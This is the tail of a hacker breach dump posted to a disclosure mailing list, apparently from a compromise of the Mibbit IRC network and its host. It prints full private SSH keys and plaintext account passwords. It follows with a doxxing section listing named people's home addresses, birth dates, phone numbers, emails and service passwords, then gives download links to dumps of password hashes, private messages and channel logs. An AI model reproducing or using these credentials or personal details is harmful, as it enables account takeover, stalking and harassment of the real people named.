drwxr-xr-x  2 backup users   1680 2011-01-13 15:57 sidewinder
drwx------  2 backup users    320 2011-08-12 18:52 .ssh
drwxr-xr-x  2 backup users   1176 2009-10-14 10:52 sydex
-rw-------  1 backup  1452   4999 2011-08-12 18:52 .viminfo

backup@...ewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII            
-----BEGIN DSA PRIVATE KEY-----
MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----

jared@...ewinder.netonecom.net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix@...ewinder.netonecom.net trix4kids

molkmin -> jared: ah, you plan on lettingothers ssh in? 
jared -> molkmin: no i thought you did 
molkmin -> jared: hell no. 
jared -> molkmin: okay well then forget what i said 
molkmin -> jared: there are like 5 people that can ssh into sidewinder 
molkmin -> jared: or maybe 7 
jared -> molkmin: and only 2 of them are convicted felons 
molkmin -> jared: I just recently secured SSH 
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL 
jared -> molkmin: grr

:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore@...il.com
Email2: jimmy@...d.net
Email3: axod@...d.net
Email4: axodmedia@...il.com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/


Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander@...il.com <<< kikicat
Email2: alanonzander@...oo.com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm


Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy@...il.com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah


Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind@....de


Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua@...siva.net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/

Kitsune
Name: Todd Parker
Email: kitsune@...global.net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html


Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon@...onecom.net
Email2: fxrocker@...il.com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn


Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi@...tsi.com
Email2: ian1potts@....com
Email3: iantom90@...mail.co.uk
http://pottsi.com/
http://www.myspace.com/56242380


Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin@...IRC.net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious

:: 0x07 - exit ::

>>> K1LL Th3 G1b50n!

attachm3nts >>>

n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html

w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html

n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html

pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp

cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html


root@...ls:~# wall <<< "E0F"
                                                                               
Broadcast Message from root@...ls                                              
        (/dev/pts/3) at [redacted] ...                                         
                                                                               
E0F                                                                            
                                                                               


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ